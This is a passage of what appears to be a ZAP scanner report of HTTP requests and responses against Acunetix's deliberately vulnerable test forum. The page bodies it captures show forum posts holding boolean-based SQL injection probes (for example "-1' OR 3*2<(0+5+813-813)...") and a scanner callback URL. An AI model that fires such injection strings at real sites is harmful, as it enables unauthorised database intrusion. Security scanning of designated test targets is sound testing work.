style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=76 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=76 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3100 |
Response Body - size: 3,100 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=77 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=77 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3100 |
Response Body - size: 3,100 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=78 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=78 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3098 |
Response Body - size: 3,098 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=79 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=79 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3098 |
Response Body - size: 3,098 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3074 |
Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>http://xfs.bxss.me</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=80 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=80 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3088 |
Response Body - size: 3,088 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:02 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 2+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=81 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=81 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3088 |
Response Body - size: 3,088 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=82 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=82 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3086 |
Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3*2<(0+5+332-332) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. 